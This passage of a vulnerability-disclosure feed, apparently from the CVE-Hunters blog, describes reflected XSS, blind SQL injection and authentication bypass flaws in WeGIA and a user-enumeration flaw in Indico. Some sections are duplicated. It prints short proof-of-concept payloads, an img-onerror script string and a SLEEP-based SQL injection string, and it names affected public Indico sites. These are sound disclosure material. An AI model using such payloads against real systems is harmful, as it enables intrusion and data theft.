class="gallery-image" data-flex-grow="76" data-flex-basis="184px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53935/ https://www.cvehunters.com/p/cve-2025-53935/ <h2 id="cve-2025-53935-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-id">CVE-2025-53935: Cross-Site Scripting (XSS) Reflected endpoint <code>personalizacao_selecao.php</code> parameter <code>id</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53935" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53935</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>personalizacao_selecao.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>id</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parameter: <code>id</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC3'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53935/image.png" width="706" height="853" srcset="/p/cve-2025-53935/image_hu_465e3ff624cdf11d.png 480w, /p/cve-2025-53935/image_hu_8c5a3f2d6253bfd4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="82" data-flex-basis="198px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-53935-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-id">CVE-2025-53935: Cross-Site Scripting (XSS) Reflected endpoint <code>personalizacao_selecao.php</code> parameter <code>id</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53935" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53935</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>personalizacao_selecao.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>id</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parameter: <code>id</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC3'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53935/image.png" width="706" height="853" srcset="/p/cve-2025-53935/image_hu_465e3ff624cdf11d.png 480w, /p/cve-2025-53935/image_hu_8c5a3f2d6253bfd4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="82" data-flex-basis="198px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53936/ https://www.cvehunters.com/p/cve-2025-53936/ <h2 id="cve-2025-53936-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-nome_car">CVE-2025-53936: Cross-Site Scripting (XSS) Reflected endpoint <code>personalizacao_selecao.php</code> parameter <code>nome_car</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53936" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53936</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>personalizacao_selecao.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>nome_car</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parameter: <code>nome_car</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC5'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53936/image.png" width="713" height="856" srcset="/p/cve-2025-53936/image_hu_b5a24124f1a5f7aa.png 480w, /p/cve-2025-53936/image_hu_c19d2cd3d802d084.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="83" data-flex-basis="199px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-53936-cross-site-scripting-xss-reflected-endpoint-personalizacao_selecaophp-parameter-nome_car">CVE-2025-53936: Cross-Site Scripting (XSS) Reflected endpoint <code>personalizacao_selecao.php</code> parameter <code>nome_car</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53936" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53936</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>personalizacao_selecao.php</code> endpoint of the WeGia application. This vulnerability allows attackers to inject malicious scripts into the <code>nome_car</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parameter: <code>nome_car</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC5'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53936/image.png" width="713" height="856" srcset="/p/cve-2025-53936/image_hu_b5a24124f1a5f7aa.png 480w, /p/cve-2025-53936/image_hu_c19d2cd3d802d084.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="83" data-flex-basis="199px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53937/ https://www.cvehunters.com/p/cve-2025-53937/ <h2 id="cve-2025-53937-sql-injection-blind-time-based-vulnerability-in-cargo-parameter-on-controlphp-endpoint">CVE-2025-53937: SQL Injection (Blind Time-Based) Vulnerability in <code>cargo</code> Parameter on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53937" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53937</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>cargo</code> parameter of the <code>/controle/control.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>cargo</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-53937-sql-injection-blind-time-based-vulnerability-in-cargo-parameter-on-controlphp-endpoint">CVE-2025-53937: SQL Injection (Blind Time-Based) Vulnerability in <code>cargo</code> Parameter on <code>control.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53937" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53937</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>cargo</code> parameter of the <code>/controle/control.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>cargo</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/controle/control.php</code></p> <p>Parameter: <code>cargo</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> ' AND (SELECT 4207 FROM (SELECT(SLEEP(10)))bAsK) AND 'LOon'='LOon </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-53937/image.png" width="915" height="924" srcset="/p/cve-2025-53937/image_hu_627764b08a014a29.png 480w, /p/cve-2025-53937/image_hu_9595da3164b60890.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="99" data-flex-basis="237px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53938/ https://www.cvehunters.com/p/cve-2025-53938/ <h2 id="cve-2025-53938-authentication-bypass-due-to-missing-session-validation-in-multiple-endpoints">CVE-2025-53938: Authentication Bypass due to Missing Session Validation in multiple endpoints </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53938" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53938</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An <b>Authentication Bypass</b> vulnerability was identified in the <code>/dao/verificar_recursos_cargo.php</code> endpoint of the WeGia application. This vulnerability allows <b>unauthenticated users</b> to access protected application functionalities and retrieve sensitive information by sending crafted HTTP requests <b>without any session cookies or authentication tokens</b>.</p> <h2 id="details">Details </h2><h3 id="vulnerable-endpoints">Vulnerable Endpoints: </h3><p style="text-align: justify;"> <ul> <li><code>/dao/verificar_recursos_cargo.php</code></li> <li><code>/dao/exibir_cargo.php</code></li> <li><code>/dao/verificar_modulos_visiveis.php</code></li> <li><code>/dao/exibir_documento.php</code></li> <li><code>/dao/adicionar_documento.php</code></li> </ul> </p> <h3 id="authentication-required">Authentication Required: </h3><ul> <li>❌ No</li> </ul> <h2 id="poc">PoC </h2><p><img src="/p/cve-2025-53938/image.png" width="1058" height="749" srcset="/p/cve-2025-53938/image_hu_e3306e3cf65cbbc2.png 480w, /p/cve-2025-53938/image_hu_50392cb7cd1239e4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="141" data-flex-basis="339px" ></p><h2 id="cve-2025-53938-authentication-bypass-due-to-missing-session-validation-in-multiple-endpoints">CVE-2025-53938: Authentication Bypass due to Missing Session Validation in multiple endpoints </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53938" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53938</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">An <b>Authentication Bypass</b> vulnerability was identified in the <code>/dao/verificar_recursos_cargo.php</code> endpoint of the WeGia application. This vulnerability allows <b>unauthenticated users</b> to access protected application functionalities and retrieve sensitive information by sending crafted HTTP requests <b>without any session cookies or authentication tokens</b>.</p> <h2 id="details">Details </h2><h3 id="vulnerable-endpoints">Vulnerable Endpoints: </h3><p style="text-align: justify;"> <ul> <li><code>/dao/verificar_recursos_cargo.php</code></li> <li><code>/dao/exibir_cargo.php</code></li> <li><code>/dao/verificar_modulos_visiveis.php</code></li> <li><code>/dao/exibir_documento.php</code></li> <li><code>/dao/adicionar_documento.php</code></li> </ul> </p> <h3 id="authentication-required">Authentication Required: </h3><ul> <li>❌ No</li> </ul> <h2 id="poc">PoC </h2><p><img src="/p/cve-2025-53938/image.png" width="1058" height="749" srcset="/p/cve-2025-53938/image_hu_e3306e3cf65cbbc2.png 480w, /p/cve-2025-53938/image_hu_50392cb7cd1239e4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="141" data-flex-basis="339px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">The lack of session validation in this endpoint can lead to several security risks:</p> <p style="text-align: justify;"> <ul> <li><b>Unauthorized Data Exposure:</b> Unauthenticated users can enumerate or retrieve sensitive internal data.</li> <li><b>Privilege Escalation:</b> Attackers might access or infer information intended only for authorized users.</li> <li><b>Information Disclosure:</b> Business logic and internal IDs (like user roles or permissions) can be leaked.</li> <li><b>Reconnaissance Support:</b> Facilitates attackers in mapping backend structures for more targeted attacks.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53640/ https://www.cvehunters.com/p/cve-2025-53640/ <h2 id="cve-2025-53640-user-enumeration-via-api-endpoint">CVE-2025-53640: User enumeration via API endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53640" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53640</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">a Broken Object Level Authorization (BOLA) vulnerability in Indico enables authenticated user enumeration via the <code>/api/principals</code> endpoint, exposing names, emails, and affiliations. Includes exploitation script, request analysis, and screenshots. Affects globally deployed Indico instances (European Organization for Nuclear Research (CERN), United Nations (UN), Massachusetts Institute of Technology (MIT), European Space Agency (ESA), among others).</p> <h2 id="details">Details </h2><p style="text-align: justify;"> A Broken Object Level Authorization (BOLA) vulnerability in the open-source application Indico allows mass user enumeration through the <code>/api/principals</code> endpoint.<br><br>Originally intended to resolve user IDs in specific form fields, this endpoint can be misused to retrieve personal details of <b>any valid user ID:</b><br> <ul><li>Full name</li> <li>Email address</li> <li>Title</li> <li>Affiliation</li> <li>Avatar URL</li> </ul> </p><h2 id="cve-2025-53640-user-enumeration-via-api-endpoint">CVE-2025-53640: User enumeration via API endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53640" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53640</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">a Broken Object Level Authorization (BOLA) vulnerability in Indico enables authenticated user enumeration via the <code>/api/principals</code> endpoint, exposing names, emails, and affiliations. Includes exploitation script, request analysis, and screenshots. Affects globally deployed Indico instances (European Organization for Nuclear Research (CERN), United Nations (UN), Massachusetts Institute of Technology (MIT), European Space Agency (ESA), among others).</p> <h2 id="details">Details </h2><p style="text-align: justify;"> A Broken Object Level Authorization (BOLA) vulnerability in the open-source application Indico allows mass user enumeration through the <code>/api/principals</code> endpoint.<br /><br />Originally intended to resolve user IDs in specific form fields, this endpoint can be misused to retrieve personal details of <b>any valid user ID:</b><br /> <ul><li>Full name</li> <li>Email address</li> <li>Title</li> <li>Affiliation</li> <li>Avatar URL</li> </ul> </p> <h2 id="exploitation-requirements">Exploitation Requirements </h2><p style="text-align: justify;"> <ul><li>A valid authenticated session is required.</li> <li>However, most public Indico instances allow self-registration with no email verification, CAPTCHA, or manual approval.</li> <li>This makes the vulnerability <b>practically exploitable by unauthenticated users</b> after trivial account creation.</li> </ul> </p> <h2 id="poc">PoC </h2><h3 id="exploit">Exploit </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">PoC</span> <span class="n">script</span> <span class="n">to</span> <span class="n">be</span> <span class="n">published</span> <span class="n">after</span> <span class="n">responsible</span> <span class="n">disclosure</span> <span class="n">timeline</span><span class="o">.</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53640/image.png" width="598" height="396" srcset="/p/cve-2025-53640/image_hu_6c6de36b9674a4e6.png 480w, /p/cve-2025-53640/image_hu_cfef9b4e7402de52.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="151" data-flex-basis="362px" /></p> <p><img src="/p/cve-2025-53640/image-1.png" width="601" height="725" srcset="/p/cve-2025-53640/image-1_hu_af3a0c7700a339e3.png 480w, /p/cve-2025-53640/image-1_hu_80b649f3bc1e6dce.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="82" data-flex-basis="198px" /></p> <h2 id="global-impact">Global Impact </h2><p style="text-align: justify;"> Indico is a widely adopted event and conference management platform developed by CERN (European Organization for Nuclear Research), powering academic and institutional infrastructure globally: <ul> <li><b>CERN (European Organization for Nuclear Research):</b> Over 900,000 events annually; 200+ rooms booked daily.</li> <li><b>Worldwide:</b> Around 145,000 events/year across 300+ institutions.</li> <li><b>UN (United Nations):</b> Over 180,000 participants/year.</li> <li><b>UNOG (United Nations Office at Geneva):</b> Up to 700,000 users/year.</li> <li>Extensively used by universities, laboratories, research institutes, and government agencies.</li> </ul> </p> <p style="text-align: justify;">Examples of affected public instances: <ul> <li><b><a href="https://indico.cern.ch/" target="_blank">https://indico.cern.ch/<a></b></li> <li><b><a href="https://indico.esa.int/" target="_blank">https://indico.esa.int/<a></b></li> <li><b><a href="https://indico.mit.edu/" target="_blank">https://indico.mit.edu/<a></b></li> </ul> </p> <p style="text-align: justify;">Due to its widespread adoption in <b>scientific, academic, and governmental</b> environments, this vulnerability poses serious risks: <ul> <li>Identity leakage of researchers, staff, and administrators.</li> <li>Large-scale privacy breaches and institutional directory exposure.</li> <li>Targeted reconnaissance for phishing or social engineering.</li> <li>Potential compromise of sensitive research and policy initiatives.</li> </ul> </p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Disclosure of personal data (PII)</li> <li>Enumeration of high-privilege users (admins, organizers)</li> <li>Supports mass phishing and spear-phishing operations</li> <li>Violates regulations such as <b>GDPR, LGPD</b>, and internal institutional policies</li> <li>May constitute a reportable breach depending on jurisdiction</li> </ul> </p> <h2 id="references">References </h2><p><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md</a></strong></p> <p><strong><a class="link" href="https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj" target="_blank" rel="noopener" >https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj</a></strong></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 14 Jul 